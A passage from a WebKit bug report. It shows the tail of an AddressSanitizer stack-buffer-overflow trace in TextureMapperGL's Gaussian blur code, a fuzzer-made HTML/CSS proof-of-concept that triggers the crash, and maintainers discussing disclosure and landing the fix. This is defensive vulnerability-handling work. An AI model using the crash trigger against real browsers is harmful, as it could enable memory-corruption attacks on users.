    #19 0x7f4c07912bd1 in std::__invoke_result<WebKit::WebProcess, WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>::type std::__invoke<void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&)::'lambda'(auto&&...), WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>(WebKit::WebProcess&&, WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>&&, WebKit::WebPageCreationParameters&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/invoke.h:96:14
    #20 0x7f4c07912bd1 in decltype(auto) std::__apply_impl<void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&)::'lambda'(auto&&...), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>, 0ul, 1ul>(WebKit::WebProcess&&, WebKit::WebProcess&&, std::integer_sequence<unsigned long, 0ul, 1ul>) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/tuple:1854:14
    #21 0x7f4c07912bd1 in decltype(auto) std::apply<void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&)::'lambda'(auto&&...), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess&&, WebKit::WebProcess&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/tuple:1865:14
    #22 0x7f4c07912bd1 in void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/HandleMessage.h:134:5
    #23 0x7f4c07912bd1 in void IPC::handleMessage<Messages::WebProcess::CreateWebPage, WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&)>(IPC::Connection&, IPC::Decoder&, WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&)) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/HandleMessage.h:236:9
    #24 0x7f4c07912bd1 in WebKit::WebProcess::didReceiveWebProcessMessage(IPC::Connection&, IPC::Decoder&) /home/fuzz/Downloads/webkitgtk-2.41.92/build/DerivedSources/WebKit/WebProcessMessageReceiver.cpp:122:16
    #25 0x7f4c08c93deb in WebKit::WebProcess::didReceiveMessage(IPC::Connection&, IPC::Decoder&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebProcess.cpp:932:9
    #26 0x7f4c0831fee0 in IPC::Connection::dispatchMessage(IPC::Decoder&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/Connection.cpp:1233:15
    #27 0x7f4c083204a5 in IPC::Connection::dispatchMessage(std::unique_ptr<IPC::Decoder, std::default_delete<IPC::Decoder> >) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/Connection.cpp:1281:9
    #28 0x7f4c08320cb6 in IPC::Connection::dispatchOneIncomingMessage() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/Connection.cpp:1346:5
    #29 0x7f4c0832338f in IPC::Connection::enqueueIncomingMessage(std::unique_ptr<IPC::Decoder, std::default_delete<IPC::Decoder> >)::$_15::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/Connection.cpp:1195:28
    #30 0x7f4c0832338f in WTF::Detail::CallableWrapper<IPC::Connection::enqueueIncomingMessage(std::unique_ptr<IPC::Decoder, std::default_delete<IPC::Decoder> >)::$_15, void>::call() /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/Function.h:53:39
    #31 0x7f4c0499d4a9 in WTF::Function<void ()>::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/Function.h:82:35
    #32 0x7f4c0499d4a9 in WTF::RunLoop::performWork() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/RunLoop.cpp:147:9
    #33 0x7f4c04b07d98 in WTF::RunLoop::RunLoop()::$_1::operator()(void*) const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:80:42
    #34 0x7f4c04b07d98 in WTF::RunLoop::RunLoop()::$_1::__invoke(void*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:79:43
    #35 0x7f4c04b05433 in WTF::RunLoop::$_0::operator()(_GSource*, int (*)(void*), void*) const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:53:28
    #36 0x7f4c04b05433 in WTF::RunLoop::$_0::__invoke(_GSource*, int (*)(void*), void*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:45:5
    #37 0x7f4bfcb20c43 in g_main_context_dispatch (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x55c43) (BuildId: c74e800dfd5f72649d673b44292f4a817e45150b)

SUMMARY: AddressSanitizer: stack-buffer-overflow /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:359:23 in WebCore::computeGaussianKernel(float, std::array<float, 6ul>&, std::array<float, 6ul>&)
Shadow bytes around the buggy address:
  0x0fe9f651cd60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe9f651cd70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe9f651cd80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe9f651cd90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe9f651cda0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0fe9f651cdb0: 00 00 00 00 f1 f1 f1 f1 00 00 00 00 00[04]f2 f2
  0x0fe9f651cdc0: f2 f2 00 f2 f2 f2 00 00 00 f2 f2 f2 f2 f2 00 00
  0x0fe9f651cdd0: 00 f2 f2 f2 f2 f2 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
  0x0fe9f651cde0: f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f8 f8 f8 f8 f8 f8
  0x0fe9f651cdf0: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f3 f3 f3 f3 f3 f3
  0x0fe9f651ce00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==237950==ABORTING
```

1. Proof-of-Concept

```cpp
<style>
.class2 { 
  -webkit-filter: blur(0em) drop-shadow(91px 36px 1024em black);
}
x48,.class0:read-only { 
  border-style: groove outset outset hidden;
}
*:nth-child(odd) { 
  display: block table;
}
style { 
  -webkit-animation: keyframes2,keyframes3 0.5s steps(454),ease-out alternate-reverse,normal both;
}

@keyframes keyframes3 {
  40% { -webkit-transform: scaleX(43) }
}
</style>

<a id="x56" ping="x" draggable="true" class="class2" translate="yes" itemtype="AAAAAAAA" charset="UTF-16" contextmenu="foo" slot="foo" webkitdropzone="copy" onfocus="f3()">
<image id="x21" tabindex="-1" preserveAspectRatio="xMaxYMax" buffered-rendering="dynamic" class="class0" paint-order="stroke markers" width="0px" vector-effect="non-scaling-stroke" clip="rect(auto,0px,auto,auto)" transform="rotate(180deg) translate(100%,284em)" x="16%">
```

1. Software Download Link
a.	https://webkitgtk.org/

Comment 1 Radar WebKit Bug Importer 2023-12-01 05:35:14 PST

<rdar://problem/119031226>

Comment 2 Fujii Hironori 2023-12-03 13:06:35 PST

Thank you very much for the report!

Comment 3 Fujii Hironori 2023-12-03 13:09:43 PST

Created attachment 468845 [details]
WIP patch

Comment 4 Fujii Hironori 2023-12-03 13:41:54 PST

Created attachment 468846 [details]
test case 2

Comment 5 Fujii Hironori 2023-12-03 13:53:37 PST

Hi, Brent.

If a securty bug is assinged to webkit-unassigned@lists.webkit.org, comments are published like 
https://lists.webkit.org/pipermail/webkit-unassigned/2023-December/1136022.html

Could you search securty bugs assinged to webkit-unassigned@lists.webkit.org?

Comment 6 Michael Catanzaro 2023-12-03 15:26:19 PST

I will request a CVE for this issue.

(In reply to Fujii Hironori from comment #5)
> Hi, Brent.
> 
> If a securty bug is assinged to webkit-unassigned@lists.webkit.org, comments
> are published like 
> https://lists.webkit.org/pipermail/webkit-unassigned/2023-December/1136022.
> html

Ouch...

Comment 7 Carlos Garcia Campos 2023-12-04 00:52:38 PST

The shadow blur patches were reverted in our stable branch because they broke rendering in rpi, so this might not affect 2.42.2.

Comment 8 Michael Catanzaro 2023-12-04 06:57:15 PST

OK great. Since no stable release is affected by this bug, and requesting CVEs for unstable releases that are only used by testers is not worthwhile, we don't need a CVE after all. But the bug still needs to be fixed in main, of course. (Good find; thanks for reporting this issue.)

I had wondered why these patches had been reverted. If they broke rendering on Raspberry Pi and it's still broken in main, maybe we should revert them there too? Are we really comfortable with Raspberry Pi being broken?

Comment 9 Fujii Hironori 2023-12-04 11:53:23 PST

bug#261870 is tracking the rpi issue.

Comment 10 Fujii Hironori 2023-12-05 20:01:11 PST

Created attachment 468907 [details]
Patch

Comment 11 Fujii Hironori 2023-12-05 20:55:40 PST

Invoking 'webkit-patch upload' complains.

> The patch you are uploading references https://bugs.webkit.org/show_bug.cgi?id=265659
> https://bugs.webkit.org/show_bug.cgi?id=265659 matches 'project:Security' and is thus redacted
> Please use 'git-webkit' to upload this fix. 'webkit-patch' does not support security changes

Should I really use git-webkit for a security bug?

Comment 12 Fujii Hironori 2023-12-06 05:04:03 PST

Comment on attachment 468907 [details]
Patch

EWS doesn't process this patch. I have to create a GitHub pull request.

Comment 13 Michael Catanzaro 2023-12-06 06:07:08 PST

(In reply to Fujii Hironori from comment #11)
> Should I really use git-webkit for a security bug?

Just make sure it creates the pull request in the security repo and not the public repo.

Comment 14 Jonathan Bedard 2023-12-06 14:03:45 PST

Pull request: https://github.com/WebKit/WebKit-security/pull/50

Comment 15 Jonathan Bedard 2023-12-06 14:06:31 PST

I reached out to Fuji, he isn't part of the security group yet, so I've posted the PR for him to get it reviewed. As Michael points out, this hasn't shipped yet, so the PR is made against `main` in WebKit/WebKit-security, we'll land in public once the change is reviewed and clears EWS.

Comment 16 Michael Catanzaro 2023-12-14 05:40:20 PST

So in the pull request I requested the addition of a RELEASE_ASSERT() to make sure the buffer index is in range. I also approved the pull request. But finally I remembered that Fujii doesn't have access to the security repo yet and could not see any of my review feedback.

I don't think we need to follow the standard security process for this particular bug because (a) it doesn't affect Apple products, and (b) it also doesn't affect stable releases of WPE/GTK (yet). It can't even land on our stable branches since the commit it fixes is reverted there, so the only place for the fix to land is main. Accordingly, I'm making this bug public now. Fujii, please prepare a pull request using the normal repo and we can get this landed. Thanks!

Comment 17 Fujii Hironori 2023-12-14 12:16:57 PST

Public PR: https://github.com/WebKit/WebKit/pull/21821

Comment 18 EWS 2023-12-14 16:11:55 PST

Committed 272081@main (15dc72ca9521): <https://commits.webkit.org/272081@main>

Reviewed commits have been landed. Closing PR #21821 and removing active labels.